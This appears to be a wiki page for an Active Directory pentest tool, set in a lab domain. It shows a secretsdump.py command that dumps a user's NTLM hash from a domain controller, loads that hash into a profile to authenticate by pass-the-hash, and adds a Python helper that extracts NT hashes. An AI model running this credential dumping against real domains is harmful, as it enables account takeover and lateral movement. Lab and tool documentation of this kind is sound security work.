Authenticating with NTLM hash
Daniel edited this page Apr 4, 2024 · 3 revisions
If you want to use an NTLM hash to authenticate to LDAP or SMB, you need to provide the NT hash. For example:
- Getting user hash through secretsdump.py
```
secretsdump.py sevenkingdoms.local/cersei.lannister:'il0vejaime'@192.168.56.10 -just-dc -just-dc-ntlm -user-status -just-dc-user cersei.lannister
cersei.lannister:1115:aad3b435b51404eeaad3b435b51404ee:c247f62516b53893c7addcf8c349954b::: (status=Enabled)
```
- settings.json
```json
{
  "profile_name": "goad",
  "profile_uuid": "5bc09493c1714c1c9ce122f962c3b8e3",
  "host": "192.168.56.10",
  "username": "sevenkingdoms.local\\cersei.lannister",
  "password": "c247f62516b53893c7addcf8c349954b",
  "domain": "sevenkingdoms.local"
}
```
- Result:
```
breads # load_profile goad
* goad
* adcs
[+] Profile goad's selected successfully!
[!] Profile settings: 192.168.56.10, sevenkingdoms.local\cersei.lannister, c247f62516b53893c7addcf8c349954b
[!] There is already information stored in this profile, do you want to keep it? : y
[!] Not changing current configuration
breads # list_dcs
[+] Domain Controllers: kingslanding.sevenkingdoms.local
```
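The steps above copy the fourth colon-separated field of the secretsdump line (the NT hash, not the LM hash before it) into the `password` key. The following is an added example, not BREADS code, that extracts that field and rejects the common copy mistakes; the function names are hypothetical, and the profile keys are the ones shown in the `settings.json` above.

```python
import json
import re

# LM hash of an empty password; secretsdump prints it when no LM hash is stored.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
HEX32 = re.compile(r"^[0-9a-fA-F]{32}$")
# user:rid:lmhash:nthash::: with the optional "(status=...)" suffix from -user-status
DUMP_LINE = re.compile(
    r"^(?P<user>[^:]+):(?P<rid>\d+):(?P<lm>[0-9a-fA-F]{32}):(?P<nt>[0-9a-fA-F]{32}):::"
    r"(?:\s+\(status=(?P<status>\w+)\))?\s*$"
)

def parse_dump_line(line):
    """Split one secretsdump NTDS line into its named fields."""
    m = DUMP_LINE.match(line.strip())
    if not m:
        raise ValueError("not a user:rid:lmhash:nthash::: line")
    rec = m.groupdict()
    rec["rid"] = int(rec["rid"])
    rec["lm"], rec["nt"] = rec["lm"].lower(), rec["nt"].lower()
    return rec

def nt_hash(value):
    """Accept a dump line, an LM:NT pair or a bare hash; return the bare NT hash."""
    value = value.strip()
    if HEX32.match(value):
        if value.lower() == EMPTY_LM:
            raise ValueError("this is the empty LM hash, not the NT hash")
        return value.lower()
    parts = value.split(":")
    if len(parts) == 2 and all(HEX32.match(p) for p in parts):
        return parts[1].lower()  # the NT hash is the second half of LM:NT
    return parse_dump_line(value)["nt"]

def set_profile_hash(profile, value):
    """Return a copy of a settings.json dict with 'password' set to the NT hash."""
    updated = dict(profile)
    updated["password"] = nt_hash(value)
    return updated

# Sample input: the secretsdump line and profile values shown on this page.
SAMPLE_LINE = ("cersei.lannister:1115:aad3b435b51404eeaad3b435b51404ee:"
               "c247f62516b53893c7addcf8c349954b::: (status=Enabled)")
SAMPLE_PROFILE = {"profile_name": "goad", "host": "192.168.56.10",
                  "username": "sevenkingdoms.local\\cersei.lannister",
                  "password": "", "domain": "sevenkingdoms.local"}

if __name__ == "__main__":
    print(json.dumps(set_profile_hash(SAMPLE_PROFILE, SAMPLE_LINE), indent=2))
```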